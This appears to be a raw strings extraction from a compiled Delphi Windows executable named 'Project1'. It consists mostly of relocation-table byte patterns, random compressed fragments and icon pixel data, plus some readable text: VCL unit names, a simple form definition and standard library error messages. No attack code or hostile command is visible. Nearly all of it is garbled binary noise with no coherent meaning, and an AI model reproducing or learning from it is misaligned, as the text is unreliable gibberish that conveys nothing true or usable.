2&2.262>2F2N2V2^2f2n2v2~2
3&3.363>3F3N3V3^3f3n3v3~3
4&4.464>4F4N4V4^4f4n4v4~4
5&5.565>5F5N5V5^5f5n5v5~5
6&6.666>6F6N6V6^6f6n6v6~6
7&7.767>7F7N7V7^7f7n7v7~7
8&8.868>8F8N8V8^8f8n8v8~8
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?0?4?8?<[email protected]?D?H?L?Z?l?
0$0D0L0P0T0X0\0`0d0h0l0|0
141T1\1`1d1h1l1p1t1x1|1
2 2$2(2,2<2\2d2h2l2p2t2x2|2
3 3$3(3,3034383H3h3p3t3x3|3
4 4$4(4,4044484<[email protected]|4
6<6D6H6L6P6T6X6\6`6d6x6
7,7L7T7X7\7`7d7h7l7p7t7
8 8$8(8,808D8d8l8p8t8x8|8
9 9-959P9p9x9|9
: :,:0:L:T:X:\:`:d:h:l:p:t:
;;;C;P;U;[;
10A0L0Y0^0h0x0
111=1T1`1
1Q2^2w2
8=:A:E:I:M:Q:U:Y:]:a:e:i:m:q:u:y:}:
:M;T;
>%>->
)0f1{1
5+555
8K92:h:
<\=c=
>=?d?x?
2,2_2s2
3h4y5
8;8j8
979~9
:-:E:q:
<2=n>
?+?]?
0>0R0
2.2G2b2
5$5-5
797G7N7f7m7
8-8X8g8{8
;&<-<7<=<D<N<S<Y<^<d<i<o<v<|<
=D=M=V=\=m=x=}=
>A>d>
?&?D?
011a1u1
2 4g4
505E5P5U5Z5g5}5
6&686
7#767?7Z7m7v7
878Y8h8v8
:8:?:N:U:s:
.0?0b0|0
1 1$1(1,1014181<[email protected]\1`1d1h1l1p1t1x1|1
2 2(2,[email protected]\2d2h2p2t2|2
3$3(30343<[email protected]`3d3s3
4'414<4F4Q4[4f4p4z4
5$5)5O5n5v5~5
5 6-6V6
7.7d7q7
8B8\8
9?9q9
9!:/:4:?:E:J:U:[:`:k:q:v:
;!;&;1;7;<;G;M;R;];c;h;s;y;~;
</=;=H=Z=
> >$>(>,>0>4>8><>T>l>p>
? ?$?(?,?0?L?l?t?x?|?
1 1$1D1d1l1p1t1x1|1
3 3$3I3W3f3}3
494G4V4m4
5)575F5]5
6 6A6P6g6v6
7"717B7t7
8.8E8
$0A0y0
0,1a1}1
4!4%4)4-4145494=4A4E4I4M4Q4U4Y4]4a4e496
7)7]7v7
768S8
9$9-;1;5;9;=;A;E;I;M;Q;U;Y;];a;e;i;m;q;u;y;};
0^1u1
2-2B2G2T2t2
5*5K5a5y5~5
5B6G6a6
7%7*7/74797?7D7I7O7V7\7c7i7p7v7}7
8$8,848<8D8L8T8\8d8l8t8|8
9><g<
>d>h>l>p>t>x>
1#101B1H1a1
1,2=2
3)303P3X3\3`3d3h3l3p3t3x3
4 4$4(4,40444H4h4p4t4x4|4
5 5$5(5,5054585<[email protected]|5
6$6,6064686<[email protected]`6
8(8H8P8T8X8\8`8d8h8l8p8
9 9$9(9,90949D9d9l9p9t9x9|9
:!:Y:]:a:y:
;';+;<;L;X;\;d;h;l;p;t;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<r<
= =(=,=0=4=8=<[email protected]=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
>%>0>@>P>X>\>`>d>h>l>p>t>x>|>
? ?1?5?H?h?p?t?x?|?
000P0X0\0`0d0h0l0p0t0x0|0
1 [email protected]\1`1d1h1l1p1t1x1|1
3(3,3H3P3T3X3\3`3d3h3l3p3t3x3|3
4,44484<[email protected]\4`4d4p4|4
5 5(5,5054585<[email protected]}5
6:6H6L6T6X6d6h6p6t6x6|6
7 7$7(7,70747D7T7X7h7
8(888D8H8P8T8X8\8`8d8h8l8p8t8x8|8
:$:,:0:4:8:<:@:D:H:L:^;m;|;
1W2g2t2
3.4I4X4o4
5*5<5R5W5s5
6*6<6A6`6m6x6
6T7`7
9?9d9t9
;I;V;j;q;
=1=C=
1'1j1
3/464M4
6:6J6
9P:}:
<T>j>
0%0w0
0,1R1{1
1A2^2
666L6
6C7`7
7&8K8s8
9*:G:|:
;G<}<
1A2H2
2l3s3
5/5O5
7m7t7
<$<,<0<4<8<<<@<D<H<L<P<^<f<|<
=&>n>
>b?o?z?
282I2g2n2
555Q5
8J8{8
=/>Q>
>%?;?v?
%0{0a1
2?2M2[2i2
5?6C6f6j6
898}8
9 9$9(9,9
<)=<=
3#3'3+3/33373;3?3C3>4d4
4&5`5
8 8N8k8
9"9&9*9.92969:9>9B9F9J9N9R9V9
=%=N=j=q=
>'>f>k>
O0<1G1s2y2
3f4m4
;!<P<
?-?s?
00050>0D0Y0g0m0x0
2!2+282H2P2X2`2h2p2x2
3 3([email protected]`3h3p3x3
4 4([email protected]`4h4p4x4
646M6x6
7$7t7
708J8
91959H9]9
: :::B:Z:^:b:{:
;$;(;,;0;4;8;<;@;D;H;L;P;\;f;j;{;
<$<(<,<0<4<8<<<@<D<H<L<P<\<h<l<}<
= =,=9===N=V=n=
? ?,?8?<?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
:0>0B0F0J0b0p0t0|0
1<1D1H1L1P1T1X1\1`1d1h1|1
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3,3<3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
4$4,4044484<[email protected]`4p4
5#5'5>5L5l5t5x5|5
7(8^8
9*9:9p9z9
#030N0
1'1W1
3.434S43686s6
8S8X8
9;9f9
9.:>:P:n:
< <-<A<N<b<t<~<
0,1s1
2%242C2
324R4r4
7-8j8
<;<P<s<
?:?X?
8U9r9
9/:A:^:
;S;i;r;
<*=g=
>P?x?
3#4D4S4m4
4^5{5
696W6
???]?
4'4]4
5$5(5,5054585<[email protected]\5p5
6'6,6T6c6
>L>T?
0:0d0
4'444
4#5/5
5i6E7j7
<O=c=
>C>P>|>
>1???
0G1b1
>P?`?
1<1k1x1
2%2+2D2d2l2p2t2x2|2
5P5i5
6'626D6V6g6q6
8 8(8,8084888<[email protected]
:+:8:J:R:Z:b:l:r:z:
;2;:;B;J;R;Z;b;j;r;z;
<*<2<8<D<J<c<
<f=n=t=
>)?1?7?C?K?
0[0f0
0/1:1Z1
373C3P3b3w3
4+4P4i4
5$5,5054585<[email protected]
5_6c6g6k6o6s6w6{6
7 7.767L7T7\7d7
9Q9f9
> ?d?
0 0y0
1$1r1
4!4:4U4b4{4
7.7<7\7d7h7l7p7t7x7|7
9%[email protected]\9c9j9q9x9
: :':.:5:<:C:J:Q:X:_:f:m:t:{:
;*;/;<;A;N;S;`;e;r;w;
<&<+<8<=<J<O<\<a<n<s<
="='=4=9=F=K=X=]=j=o=|=
>#>0>D>I>
232?2G2U2]2o2
3+303I3p3
4 4$4(4,4044484<[email protected]\4`4d4h4l4p4t4x4|4
6 6/6
7'7s7
8.8;8G8T8f8s8
:(:,:0:4:8:L:_:c:s:
= =\=`=d=p=t=
>2>6>:>>>B>T>e>i>y>
?-?O?s?
040l0z0
0.161H1Z1j1
4 4/4?4
7$7`7
9&909<9
<D=x=P>Z>_>i>p>
? ?(?,[email protected]?D?L?P?X?\?d?h?p?t?|?
0*0/0<0L0X0\0d0h0l0p0t0x0|0
1"2E2h2t2
3&3.3M3U3Y3p3x3
3%4J4o4
5(5L5q5
6 6$6(6,[email protected]\6m6u6
7 7$7(7,7074787<[email protected]\7`7d7h7l7p7t7x7|7
8(8:8>8P8`8p8x8|8
9 9$9(9,9094989<[email protected]\9`9d9p9|9
:":?:G:d:l:
;";&;:;B;`;h;l;
<7<C<Y<
=9=A=_=g=
>9>A>E>[>
?D?i?
0>0f0
1E1h1x1
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<[email protected]\3`3d3h3l3p3t3x3|3
4!424:4R4Z4^4t4
616Z6^6
7'7C7K7O7f7j7n7
8=8b8
9<9X9
:$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
;0;8;P;s;{;
<&<D<j<r<v<
<a>k>
2G3T3
5X5g5~5
7n7;8
<o<~<
= =$=(=,=0=4=8=<[email protected]=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
<O<u<
0$0,040<0D0L0T0\0d0l0t0|0
1$1014181<[email protected]\1`1d1h1l1p1t1x1|1
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3 3/3;3H3Z3g3s3z3
4&4,4H4
5 5$5(5,5054585<[email protected]\5`5d5h5
6 6$6(6,6064686<[email protected]\6
7<7D7H7^7j7
8/878N8V8Z8m8q8u8
9 9A9j9r9
:':=:b:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;p;
< <$<(<,<0<4<m<
>(?0?>?J?
1!131C1]2j2y2
<0=K=m=
;';:;B;L;`;l;p;|;
<0<H<L<\<h<
=([email protected]=D=T=d=p=t=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>p>
?_?v?
0]0o0
2?3h3
4F4q4
6$6e6o6{6
9+979D9V9{9
:&:G:S:[:c:n:
;";(;H;P;T;X;\;`;d;h;l;p;t;x;
<&<4<8<H<W<[<l<t<x<
=?=G=c=k=
>&>E>M>d>h>l>
0 0$0(0,0004080<[email protected]\0`0d0h0l0p0t0x0|0
1"101>1B1S1W1[1s1{1
2)212O2W2[2o2w2
2 3C3K3i3q3
4$4(4;4C4\4d4
636X6}6
777]7
8Q9e9p9J:k:
?5?<?U?i?{?
$0B0Q0`0o0
374i4
5+5h5
7Y8g8
= =2=B=H=h=p=t=x=|=
=r?|?
2"4)4
5"5&5*5
8+979>9H9Z9j9p9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
: ;0;<;@;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
< <$<(<<<N<R<d<t<
= =$=(=,=0=4=8=<[email protected]=L=X=\=m=u=
>!>%>;>C>G>[>c>
?5?=?A?T?}?
0=0E0I0`0d0h0
171\1
2:2^2
2V3Z3b3h3
4 4$4(4,4044484<[email protected]\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585<[email protected]\5`5d5h5l5p5t5x5|5
6$60646<[email protected]\6`6d6h6l6p6t6x6|6
7 7$7(7,7:7>7B7F7X7j7n7
8+878M8U8Y8m8u8
:":*:F:N:R:i:m:q:
;>;c;
<8<\<
=9=`=|=
=!>%>)>0>
? ?$?(?,?0?4?8?<[email protected]?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
0 0$0(0,00040B0n0r0v0z0~0
1 10181<[email protected]\1`1d1h1l1p1t1x1|1
8a8U9
=+>H>
0X1{1]2{2
6!686q6
7H7!8>8
:#:-:h:
535B5V5^5
6;7W:7;g<
=,>V?
0#0:0
1 1(1,1014181<[email protected]\1`1d1h1l1p1t1x1|1
172C2P2b2h2
3 3$3(3,3034383<[email protected]
3(4b4m4x4
5/5;5T5z5
8J8R8p8~8
:1:b:
=$>\>
?3???I?S?X?g?y?
0$0(0,0004080<[email protected]\0`0d0h0x0
101L1P1d1
2 2$2(2,2024282<[email protected]\2`2d2
3-313D3d3l3p3t3x3|3
4 4$4(4,4044484<[email protected]
5 5$5(5,5054585<[email protected]\5w5
5$6<6X6p6
7$7(7,7074787<[email protected]
9G9K9O9T9
:e:i:m:q:x:
;q;u;y;};
<p<t<x<|<
<B=F=R=X=
=B>F>J>N>R>X>
>D?H?P?T?
0 0$0(0,0004080<[email protected]\0`0d0h0l0p0t0x0|0
0:1>1B1F1J1N1R1V1Z1^1b1f1j1n1r1v1z1~1
2"2&2*2.22262:2>2B2F2J2N2R2V2Z2^2b2p2~2
323>3Q3t3|3
4 4$4(4,4044484<[email protected]\4`4d4h4l4p4t4x4|4
6D6`6r6
7 7$7(7,7074787<[email protected]\7`7d7h7l7p7t7x7|7
9"9&9*9.92969:9>9B9F9J9N9R9V9Z9^9b9f9j9n9r9v9z9~9
:":&:*:.:2:6:H:Y:]:p:
; ;$;(;,;0;4;8;<;@;D;H;P;d;y;};
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<[email protected]=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
>">&>*>.>@>Q>U>h>x>
? ?4?D?T?\?`?d?h?l?p?t?x?|?
0"0<0^0f0
141<1T1t1|1
1H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3$3D3L3P3T3X3\3`3d3h3l3x3
4 4$4(4,4044484<[email protected]\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585<[email protected]\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686\6
;<;D;H;L;P;T;X;\;`;d;h;l;p;t;
>A>P>
243n3
4e5w5
7P7]7f7o7
7"8*878>8L8W8]8v8
9(989I9V9x9
:#:>:J:R:d:
;+;0;:;@;H;
< <%<1<;<A<I<j<r<
=(=^=
>">8>@>N>`>p>y>
?3?>?G?U?h?
0$0+01090O0Z0o0y0
1#1)171=1K1V1j1{1
373G3~3
304?4~4
4n5V6
7 7d7
8K8N9l9
94:>:R:W:c:w:
=W=;>{?
4K5;6A6d6j6
7?7y7
9/<S<b<
?N?f?~?
0P0Y0z0
4.5;5J5!717
0 1H1p1`3k3y3
=>>S>e>
1w1{1
455a5
7T8d8
889f9
041F1|1
4M4V4d4
8b8l8
:3<;<N<
9F9l9w9
<3=g=
1s2Q3e3|4
315A5
9t9z9%;
474\4
555v5
;#;n;
0\0M2T2
6-6_6
5,8>8O8g8
9U:s:\;
2 4g5
9_9i9s9}9
;5;A;I;U;`;f;r;|;
<!<&<1<6<;<F<K<P<[<h<z=
>#>4>E>[>c>r>|>
???L?V?g?p?
0%03080=0G0W0b0o0
1(121<1N1c1o1
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
3 3,30383<[email protected]\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<[email protected]\4`4d4h4l4p4t4x4|4
5$5(5054585<[email protected]\5`5d5h5l5p5t5x5|5
60686<[email protected]\6`6d6h6l6p6t6x6|6
6g708j8
9.9B9
;L<`<t<
3+474D4V4_4d4o4t4
445M5h5
606F6J6
7,8H8
;,;V;
<N<^<
?4?O?^?
3$343]3m324O4l4
4r5'6Q6`6w6
8+8V8s8
8&9w9
:`:u;
</<X<h<
=H=e=
==>E>O>U>`>p>{>
0<0D0H0L0P0T0X0\0`0d0t0
1g1k1s1x1
1N2R2V2Z2`2
3 3$3(3,3034383<[email protected]\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484F4N4f4j4n4r4v4z4~4
5 5D5H5L5e5m5
656=6Z6f6
7-797O7t7
8 8$8(8,8084888<[email protected]^8n8r8v8
9 9$9(9,9094989<[email protected]}9
:/:7:S:[:|:
: ;>;
< <$<(<,<0<@<P<T<b<
=#='=E=M=f=
>$>H>h>p>t>x>|>
545g5
5/6l6
97:H:
;&;2;
?9?D?
0i0C1
3%4/494L4V4i4s4
7i7C8
8A9e9R:
3)4T4Y4a4f4{4
475i5
6v6Z7
8C9x9
1-1:1\1a1
9=9I9]9i9n:
<Z=j=
111M1w1
3"4u4
5 5$5(5,5054585<[email protected]\5g5s5z5
6$6.656?6F6P6X6t6
7$7;7?7M7U7r7z7
9'9T9d9p9t9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:
;,;K;
; <9<p<
>+>X>
?d?i?m?q?x?
0 0$0(0,0004080<[email protected]\0`0d0h0l0p0t0x0|0
0V1Z1^1b1f1j1n1r1v1z1~1
2"2&2*2.22262:2>2B2F2X2i2m2|2
3 3$3(3,3034383<[email protected]\3`3d3h3l3p3t3x3|3
4*424J4R4o4w4
5&5.525L5T5X5r5z5
6'6/6R6Z6
7"7=7`7
8.8Q8Y8]8y8
9.9W9[9_9
:1:9:=:T:y:
;.;:;S;_;y;
<;<G<^<j<
=$===I=b=
> >9>E>[>g>
?F?R?h?t?
0,080<0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<[email protected]|1
2 2$2(2,2024282<2L2X2\2l2t2x2|2
3$30343D3L3P3T3X3\3`3d3h3l3p3t3x3|3
5 5.5;5K5b5~5
6 6(616A6H6O6V6g6o6u6
7)7?7n7
536C6
;H;k;
<:=E=T=y=
>C>H>d>
>)?=?Q?r?y?
0T0g0
0(1q1v1
132b2
203V3
4U4i4
6>6I6V6\6g6t6
=<>L>i>
>F?S?c?}?
3A4_4
6<6R6~6
6<7F7.9=9T9h9
:z;v<
=!===`=
=+>=>[>n>
? ?7?O?a?
1/1Y1
2Z3|3
405n5}5
5T6z6
7"797\7?8
:":_:
1&1:2F2
5E8h8w8
889T9p9
:U:n:
<#<H<d<
>K>[>y>!?+?
0,1l1{1
2.2D2q2{2
3&343F3]3g3v3
6O8l8
<e=Q>
?(?U?_?j?|?
2,2s2
2Q3k3
4_5r5z5
<,=7=B=\=a=
>)>9>F>L>a>g>t>
G0Y0^0
595%6
7#7d7
<4=\>|>
465p5{5
?;?X?n?
002V2
2$3G3
8 8c8
869F9Q9
:&:5:?:D:`:p:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
<,<S<[<s<
=,=4=Q=Y=u=}=
>%>->K>S>W>k>
?#?6?>?\?d?
0&0>0g0o0
1%1-111H1P1i1q1
252^2
3:3_3
434U4}4
5<5\5d5h5l5p5t5x5|5
2 2$2(2,2024282<[email protected]\2`2d2h2l2p2t2x2|2
4/5;5H5a5m5w5
5#666H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7$7(7,7074787<[email protected]\7`7d7h7l7p7t7x7|7
8 8(838=8J8O8W8a8
2X2`2h2p2x2
[email protected]\3`3d3h3l3p3t3x3|3
4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6
:`:d:h:l:p:t:x:|:
:L;\;d;l;t;|;
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<[email protected]=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>
.iEpk
Y~}p(
gsQEG
%z38_
Lfp7YRGGtf
WqLHcZ:l^
08`d"
iPAj-
\KqA%
&l:4aR
VP,WA
'$dB=0
;CvZG
D1CoV
k,3?_
siY7Ki,{
CZ>hz
o.4[gPL?Z
5Bdv?UU
K~cA>
T{R+r
ztzw<
iLDxj
*pogJ
v( uI#
'-XPw
'PR;SX
4(>Gw
>F6ns
]T<H]
";lL9
3co4(x
-J$F0
>V%1mg
MyUOht
!t\+v
E/vNq
#_#)4h
:<%2i
.wI'f
,tLGD:
Sw{4q
6*jDQ
9hu]7Mt
ZjwJr
20k+&
6C;;j
3sE=V
7 B]ZW]
LD)Ed
R2<u-
Q$z`J
';6,n?v
@gVOQ
g0rN=
56-n3
OTThr$
,v7#m
)P+Kv
F2/LO>zC
#gY$JI
7w_10
|9?J%
^+Qcu
o%kNW
\=e%Tq
.5#fR
"Rxt&
7MR8#
ID+CF
=Mssr
1R|un
`#MWr
*/Fg`&^
ieB&06}z
Ab#iN
1UeG.
=?\bR
&=?RN
U8):>
"o>JAR
!hMN)
7Lg1&
;zyV%
Tq$Z
Xj~EE
/>n}7
B-Yk~b
VYe,y
v$&rBZoP6
;g|#z
m&+,@7
([cHPL
b-(xf
Op8(`
hi`0{
1!-.k
b:Gr'q
OpK{W
^++j-
vy8^o
*k%`*
/W35C
^mlNZ
oQzkR
`Li'#
O2O-{
<_E/H
FB17"
9/<a.C
_"ZsIK
,zXYf|
y12]I
%Q`VnY
cj4|W
C,l"l
(X=&o
P3p`n
9CK:7
oq;<]r
eG)i4!q
&'U:,
(v$FI
Il{J.
#hi&0
dG .8
y_jla
ZZ%,1
rT~\f!|
md7}n
N# /@
fv>'(
eu&o^
YTg#YI0
Xm'[me
7!_b'=
gN6}]\
x]f*VM
k+xQ5a
3LM(OS
d>{1=
&jgTQw
fj]!x
Q%c\Z
P(2(i<
t63*f
m}%HS AK9
DXMPu
`X/f/
ClU1V
n"-!$
WXJb3!
(6YYP
x:#=M
7{'D<
2vs,u
jSoPnr
9eTIR
PPs4{
(poeP
s6\eZ
?L2PC&
Vk6J
Y=J|B}a
o(we&
EH<{S
5cLzj
mhGqo
bs`-C
'-[F^
f"u<8
riP\6
"YQVU
%Bj1_
Zy+sT
Kz/ZP
zns#*
!f.zm
q2|:U
v_Ad+q Q
Nk;ow
Bc5{y
>j_+6!
nSeEv)
1-183
)R*lQ1
lb7%(
NRi"le
JC.&_
Fs>]0
N_s<j
nYM$VD
)[_T0
x$CV_
McOQg
h5.|!
:y[Pw
~rsb|
F8hjB
C/Vg">0
|SNHS4
S\/8H
q"eGK
[bxqH
746-n
i_ ASwu
1{t3n
mv~ j
:I"|>S
Z#2#`
h<v_/D
$!a!)@
LeP>L
v<C2bu
`K-.=
d#{4c
%BY%{
wx[P7
c"hYe
t&^eF
F+fzYI
q]}#d
Oj\&<
3)+-Sm
<Kl#)[
i$,Mq?
=OrU>
YC3Pkf
4SWFi=
suPb_
n9,dS
>JsjyC
;\fl\|M3
B+ib1]
PG-&\Q
/=K5V
i8)&H
/iafb
tsld`
B.}L"
&q,:V
z57*o*/
zx]o}+rQnc
:0)%h
#HTZt
C2t<#<
T=a3"
q6#E1/
UGZi'=
PH%dI
u0>U4
CvHM#
Una%$
e4a5K;
k4aPY
L`%v=
2+3x1
{?L M
Ioyq.`
nB Q4
N|ua1-d
CuL.pG
9XJN#
.c#~0
6Om}a
||Kp>
Ql{@U
4Dsw`
~,X[>
XyZ?Tl$
uo./M
8QrV8
#a;Wx>
C%3,T,;I
jVXe{:lt
]9'no
%V9Lf
0]Bw~
'i*He=P%
ytsp+
U^[68
u8x9/
,rk{q
GvGVX
JKu<K
7B& D
b$Nwf
(=*w
'psF+
l_REkD
^^9o*k
ws8A%
,([TZ
,%Ad#x6
8kV+
k2Msi
'.P16V
HvqYO
mF&:8T<-qYC
p#7ij
Pz=KTWe
y~-8=d;
+3k/?
WnMI-[
O?qn(O
-9gM([
i7m}Keg
FmM+]
qSk86
:Tr=D
^2`91
hihx8r
]ew)d
S{:Af?t
PZM+|
wx>xdm
-&}9>
~g+ +
uV:jTB
j:< 2
~;XpD
3{lq6
a3sPa
m"V-=aR
NYy }
uf gQ*
f?Gnr(
k>>gT]_$V
4)3D[
lW>KK#
(z>cZe
S1?L;
J:0>3^
H.g+jK:
T/P'*
CY)5h
&$MQ^
4N+b[I>L
s4[UH
^Mc_d
/>uXVYv
U~8yb
]PaQR
ta&\/
(wT4&J1
FSoXR`
z[5a9
{eL4i
$}D3S
DPNQ,uE
hegE~
3T96s5
\a5*:
)8N6{
:3~09
4V8Vr
sbNkm
v<Eugi
O7z8}
*2IhW
~&X#r
jxN~6
VW/_P
Ia xb
g]N;mjPJ
"*%P9
+x i7
$_<1/
I9B\=
/44r2
u=&M[
a("#>
>>-?P
tn[_'Q
tj,!A
sv2U+
^7U`$b
YjU:t
i~;'1
gQ0S9
+E7o+
uva]d
t4pQl
h|nmJ
em3LF
([z|@.G
o~U#0;
zD[3,i
fb5/c
+L%=gKphH
E4sj3{H
)_c/[
$l+P*
4`Cna
yW2{I
cC3Sg
L6(lF
,V`Nd
Y^!_Y
{![9q
,[cdx
|)k8hia
m<\vs
,yjI\QJb0`
UD.vN
Z{8Ih
_5jfm
x+[}1GT
!;<uO
S:W7(
5-#ec
7Q^$xH
U>s"$
J:_$sP
_>9OV
f:SVw
'~1:m
HLiD<
<x5Xl
r7%"K
JNd"R
Y;Q9C)
4euW4
/^glu8
"/JrW
,deTb
shghC
}2-Ic|]
rQ4d'
"98-!
XQ6Xq
frs/M
(?BZ0%
i*1-zH~2
dhmf/
M[S2*
,HwhZ
(zrIi
kG,0Z
.VT]D[
x&N7A
Ei/Cm
>]blQ
mbcny
w`(',
"T~:i6
}b#l=
;J$lC
>/eJ3
s97%Li!
q1I7w
T"Ep5
OTj}A
/+? B
:VB~k
vvmx|*
SrkMbJ
===F9
5>S3e
\brA)IT5
#6Sh|
s.HkzB
:gD]o
LY"$8
I1io&
;g7)t
9H!0]?8
333333333333333333
33333333?333333
33?33
33338
33333
33833
333338
33333833
33333
333838
3333339
3333333333333338
333333333333333333
334C33333338
33333
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*"*"$3338
"C338
"*"$33
"*:"$
"J"$3
:33:"$
"C8338
"J"C3333
3333:"$
#33338
33333
"J333333
33333:"$3333338
333333
$3333333
333333:"33333338
3333333
33333333
333333333333333333
33333333?333333
33?33
33338
33333
33833
333338
33333833
33333
333838
3333339
3333333333333338
333333333333333333
33DDDDD3333
33333333333
333333?
333333
333333
3333f3333333?
3336Dc3333338
333>fC333333
c333333
3333333333338
3333Dc3333333
3336fC3333338
333>fC333333
333>fd333333
fC33333
3333>fd333338
334C3
fC333?3
33fd3>fC333
fDFfC338
33>ffffc338
fff3333
33833
33338
3333333333338
4DF334DC33
333*C33
c33*C333
338?3
33338?383
F*F333383
"$c33333
"dc3333833
CjC338
CjC338
D*C33383
33333
3332*
C33333833?33
3333"
3333333
3334JC33333338?333
C3333333
C3333333
3333fc33333338
333333333333?
33333?
333333
333333333333333333
333333333333333333
333333333333
33333
334C33333338
33333
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
"C333
3333:"$3333338
33333
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
333DDD33333?
2C4"""D338
2$B""""C38
2""333:"C8
83338
2""#33:DC8
333338
33333
333333333333333
333333DDD3
:DC33:""$8
:"C333
$334B"$3
"DDB""$3
3:"""""
333333
333333333333333333
333333333333333333
333333333333
33333
334C33333338
33333
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
"C333
3333:"$3333338
33333
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
33333333
xzJjfghNMMF
_QTIcXZ
S?C<\FIx{`d
ZDH3`HM|~bh
TGJ XILTmV[
|~Ntdf
7Project1
)CheckLst
Consts
System
SysInit
"RTLConsts
5Themes
SysUtils
KWindows
UTypes
SysConst
nComCtrls
Printers
WWinSpool
^Classes
3Messages
CVariants
$VarUtils
QTypInfo
sActiveX
+Graphics
Forms
CommCtrl
FlatSB
StdActns
Clipbrd
YStrUtils
*ShellAPI
&Controls
MultiMon
vMenus
Contnrs
ImgList
EActnList
dStdCtrls
Dialogs
ExtCtrls
IDlgs
3CommDlg
(ShlObj
RegStr
?WinInet
UrlMon
WinHelpViewer
RHelpIntfs
ComStrs
ExtActns
0Mapi
ExtDlgs
Buttons
8Registry
IniFiles
CUxTheme
SyncObjs
RichEdit
ToolWin
ListActns
Unit1
TForm1
Form1
Width
Height
Caption
2jsJPdzYfH
Color
clBtnFace
Font.Charset
DEFAULT_CHARSET
Font.Color
clWindowText
Font.Height
Font.Name
MS Sans Serif
Font.Style
OldCreateOrder
PixelsPerInch
TextHeight
TPanel
Panel1
Width
Height
Caption
Panel1
TabOrder
TLabel
Label1
Width
Height
Caption
Label1
TRadioGroup
RadioGroup1
Width
Height
Caption
RadioGroup1
TabOrder
TCoolBar
CoolBar1
Width
Height
Bands
Control
CheckListBox1
ImageIndex
Width
TSplitter
Splitter1
Width
Height
TCheckListBox
CheckListBox1
Width
Height
ItemHeight
TabOrder
TPopupMenu
PopupMenu1
TSavePictureDialog
SavePictureDialog1
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
jjjjjj
ebutton
clock
combobox
explorerbar
header
listview
progress
rebar
scrollbar
startpanel
status
taskband
taskbar
toolbar
tooltip
trackbar
traynotify
treeview
window
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
jjjjj
A(A4AHAXAhA|A
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBRETRY
BBYES
PREVIEWGLYPH
DLGTEMPLATE
DVCLAL
PACKAGEINFO
TFORM1
MAINICON
MS Sans Serif
Scroll Bar
3D Dark Shadow
3D Light
Window Background
Window Frame
Window Text=This control requires version 4.70 or greater of COMCTL32.DLL
No help keyword specified.
Button Face
Button Highlight
Button Shadow
Button Text
Caption Text
Default
Gray Text
Highlight Background
Highlight Text
Inactive Border
Inactive Caption
Inactive Caption Text
Info Background
Info Text
Menu Background
Menu Text
Silver
Yellow
Fuchsia
White
Money Green
Sky Blue
Cream
Medium Gray
Active Border
Active Caption
Application Workspace
Background
- Dock zone not found
- Dock zone has no control
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count"Unable to find a Table of Contents
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Black
Maroon
Green
Olive
Purple
Shift+
Ctrl+
(None)
Unable to insert a line Clipboard does not support Icons/Menu '%s' is already being used by another form
Picture:
(%dx%d)
Preview
Docked control must have a name%Error removing control from dock tree
&Ignore
N&o to All
Yes to &All
Enter
Space
Right
Cannot drag a form
Metafiles
Enhanced Metafiles
Icons
Bitmaps
Warning
Error
Information
Confirm
Cancel
&Help
&Abort
&Retry
Menu inserted twice
Sub-menu is not in menu
